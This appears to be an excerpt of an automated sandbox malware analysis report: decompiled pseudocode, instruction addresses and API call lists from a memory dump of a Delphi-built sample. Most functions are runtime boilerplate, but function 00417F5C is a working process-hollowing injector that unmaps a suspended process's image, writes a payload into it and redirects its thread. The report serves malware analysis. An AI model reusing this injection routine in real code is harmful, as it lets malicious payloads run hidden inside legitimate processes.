					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t16 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t16);
							_t38 =  *((intOrPtr*)(0x454640));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x419000 = 0x419000;
					goto L6;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L4;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00405824, Relevance: 1.5, APIs: 1, Instructions: 31
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
				char _v1032;
				int _t13;
				void* _t22;

				_t21 = __edx;
				if(__eax != 0) {
					if( *(__eax + 4) >= 0x10000) {
						return E00404080(__edx,  *(__eax + 4));
					}
					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
					return E00403F78(_t21, _t13, _t22);
				}
				return __eax;
			}






    0x0040582c
    0x00405832
    0x0040583b
    0x00000000
    0x0040586c
    0x00405855
    0x00000000
    0x00405860
    0x00405879

    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00404D84, Relevance: 1.5, APIs: 1, Instructions: 26
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E00404FC0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








    0x00404d8c
    0x00404d92
    0x00404da2
    0x00404dab
    0x00404db0
    0x00404db2
    0x00404db7
    0x00404dbc
    0x00404dbc
    0x00404db7
    0x00404dca

    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00403B18, Relevance: .0, Instructions: 37
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00402670, Relevance: .0, Instructions: 14
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x41903c(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402778(1);
					}
				}
				return _t6;
			}





    0x00402673
    0x0040268a
    0x00402675
    0x00402675
    0x0040267b
    0x0040267f
    0x00402683
    0x00402683
    0x0040267f
    0x0040268f

    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00403B78, Relevance: .0, Instructions: 12
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
				void* _t6;
				intOrPtr _t7;

				_t7 = __edx;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454638 = __eax;
				 *0x45463c = 0;
				 *0x454640 = __edx;
				_t1 = _t7 + 4; // 0x400000
				 *0x45402c =  *_t1;
				E00403A70();
				 *0x454034 = 0; // executed
				_t6 = E00403B18(); // executed
				return _t6;
			}





    0x00403b78
    0x00403b78
    0x00403b82
    0x00403b8c
    0x00403b93
    0x00403b98
    0x00403b9e
    0x00403ba1
    0x00403ba6
    0x00403bab
    0x00403bb2
    0x00403bb7

    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 00417F5C, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 236
    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				CONTEXT* _v16;
				void* _v20;
				void _v24;
				void _v28;
				long _v32;
				struct _PROCESS_INFORMATION _v48;
				struct _STARTUPINFOA _v116;
				CHAR* _t95;
				short* _t171;
				intOrPtr _t182;
				intOrPtr _t189;
				intOrPtr* _t194;
				short* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				intOrPtr _t201;
				void* _t215;

				_t215 = __fp0;
				_t199 = _t200;
				_t201 = _t200 + 0xffffff90;
				_t196 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t199);
				_push(0x418218);
				_push( *[fs:eax]);
				 *[fs:eax] = _t201;
				if(_v12 != 0) {
					_push(0x418230);
					_push(_v8);
					_push(0x41823c);
					_push(_v12);
					E00404208();
				}
				 *_a4 = 0;
				_t171 = _t196;
				if( *_t171 == 0x5a4d) {
					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
					if( *_t194 == 0x4550) {
						E00402B60( &_v116, 0x44);
						E00402B60( &_v48, 0x10);
						_v116.cb = 0x44;
						_v116.dwFlags = 1;
						_v116.wShowWindow = 0;
						_t95 = E00404348(_v12);
						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
							 *_a4 = _v48.dwProcessId;
							_v16 = E00417F28( &_v20);
							if(_v16 != 0) {
								_v16->ContextFlags = 0x10007;
								if(GetThreadContext(_v48.hThread, _v16) != 0) {
									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
									if( *(_t194 + 0x34) != _v24) {
										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
									} else {
										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
										} else {
											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
										}
									}
									_t210 = _v28;
									if(_v28 != 0) {
										_t197 = E00417EA4(_t196, _t210);
										_t125 = _v28;
										if( *(_t194 + 0x34) != _v28) {
											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
											 *(_t194 + 0x34) = _v28;
											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
										}
										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
										SetThreadContext(_v48.hThread, _v16);
										ResumeThread(_v48.hThread);
										WaitForSingleObject(_v48.hThread, 0xffffffff);
										_push(_t199);
										_push(0x4181d0);
										_push( *[fs:eax]);
										 *[fs:eax] = _t201;
										TerminateThread(_v48.hProcess, 0);
										CloseHandle(_v48.hProcess);
										_pop(_t189);
										 *[fs:eax] = _t189;
									}
								}
								VirtualFree(_v20, 0, 0x8000);
							}
							if( *_a4 == 0) {
								TerminateProcess(_v48, 0);
							}
						}
					}
				}
				_pop(_t182);
				 *[fs:eax] = _t182;
				_push(E0041821F);
				return E00403EAC( &_v12, 2);
			}























    0x00417f5c
    0x00417f5d
    0x00417f5f
    0x00417f65
    0x00417f67
    0x00417f6a
    0x00417f70
    0x00417f78
    0x00417f7f
    0x00417f80
    0x00417f85
    0x00417f88
    0x00417f8f
    0x00417f91
    0x00417f96
    0x00417f99
    0x00417f9e
    0x00417fa9
    0x00417fa9
    0x00417fb3
    0x00417fb5
    0x00417fbc
    0x00417fc5
    0x00417fcd
    0x00417fdd
    0x00417fec
    0x00417ff1
    0x00417ff8
    0x00417fff
    0x0041801c
    0x00418032
    0x0041803e
    0x00418048
    0x0041804f
    0x00418058
    0x0041806d
    0x0041808e
    0x00418099
    0x004180fc
    0x0041809b
    0x004180aa
    0x004180df
    0x004180ac
    0x004180c4
    0x004180c4
    0x004180aa
    0x004180ff
    0x00418103
    0x00418110
    0x00418115
    0x0041811a
    0x00418122
    0x0041812a
    0x00418139
    0x00418139
    0x0041814f
    0x0041816f
    0x0041817d
    0x0041818b
    0x00418194
    0x0041819f
    0x004181a6
    0x004181a7
    0x004181ac
    0x004181af
    0x004181b8
    0x004181c1
    0x004181c8
    0x004181cb
    0x004181cb
    0x00418103
    0x004181e5
    0x004181e5
    0x004181f0
    0x004181f8
    0x004181f8
    0x004181f0
    0x00418032
    0x00417fcd
    0x004181ff
    0x00418202
    0x00418205
    0x00418217

    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00404E08, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00404DF4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00404DF4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401248();
									while( *_t93 != 0) {
										_t90 = E00404DF4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401248();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401250();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401248();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401250();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401248();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401248();
						}
					}
				}
				L17:
				return _v16;
			}



















    0x00404e14
    0x00404e17
    0x00404e1d
    0x00404e2a
    0x00404e2e
    0x00404e70
    0x00404e76
    0x00404eb3
    0x00000000
    0x00404e78
    0x00404e7f
    0x00404e90
    0x00404e95
    0x00404e9b
    0x00404ea3
    0x00404ea8
    0x00404eb6
    0x00404eb8
    0x00404ebe
    0x00404ec2
    0x00404ec9
    0x00404eca
    0x00404f75
    0x00404edc
    0x00404ee0
    0x00404eed
    0x00404ef4
    0x00404ef5
    0x00404efe
    0x00404eff
    0x00404f17
    0x00404f1c
    0x00404f1f
    0x00404f24
    0x00404f2a
    0x00404f2b
    0x00404f3b
    0x00404f3d
    0x00404f4d
    0x00404f54
    0x00404f5e
    0x00404f5f
    0x00404f64
    0x00404f6a
    0x00404f6b
    0x00404f71
    0x00404f73
    0x00000000
    0x00404f73
    0x00404f3b
    0x00404f1c
    0x00000000
    0x00404eed
    0x00404f81
    0x00404f88
    0x00404f8c
    0x00404f8d
    0x00404f8d
    0x00404ea8
    0x00404e95
    0x00404e7f
    0x00404e30
    0x00404e3b
    0x00404e3f
    0x00000000
    0x00404e41
    0x00404e41
    0x00404e4c
    0x00404e50
    0x00404e55
    0x00000000
    0x00404e57
    0x00404e5a
    0x00404e61
    0x00404e65
    0x00404e66
    0x00404e66
    0x00404e55
    0x00404e3f
    0x00404f92
    0x00404f9b

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040B2B4, Relevance: 3.0, APIs: 2, Instructions: 37
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40b318);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E004040F8( &_v16, 7,  &_v11);
				_push(_v16);
				E00407174(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040B31F);
				return E00403E88( &_v16);
			}








    0x0040b2b4
    0x0040b2bd
    0x0040b2c2
    0x0040b2c3
    0x0040b2c8
    0x0040b2cb
    0x0040b2da
    0x0040b2ea
    0x0040b2f2
    0x0040b2fb
    0x0040b304
    0x0040b307
    0x0040b30a
    0x0040b317

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040587A, Relevance: 1.5, APIs: 1, Instructions: 38
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040587C, Relevance: 1.5, APIs: 1, Instructions: 37
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00409DB0, Relevance: 1.5, APIs: 1, Instructions: 29
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00403EDC(_t10, _t18);
				}
				return E00403F78(_t10, _t5 - 1,  &_v260);
			}






    0x00409dbb
    0x00409dbd
    0x00409dd5
    0x00000000
    0x00409ded
    0x00000000

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00409DFC, Relevance: 1.5, APIs: 1, Instructions: 23
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






    0x00409dff
    0x00409e00
    0x00409e16
    0x00409e1d
    0x00409e18
    0x00409e18
    0x00409e18
    0x00409e23

    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00417A70, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
    C-Code - Quality: 100%
    			E00417A70() {

				if( *0x454a18 == 0) {
					 *0x454a18 = GetModuleHandleA("kernel32.dll");
					if( *0x454a18 != 0) {
						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
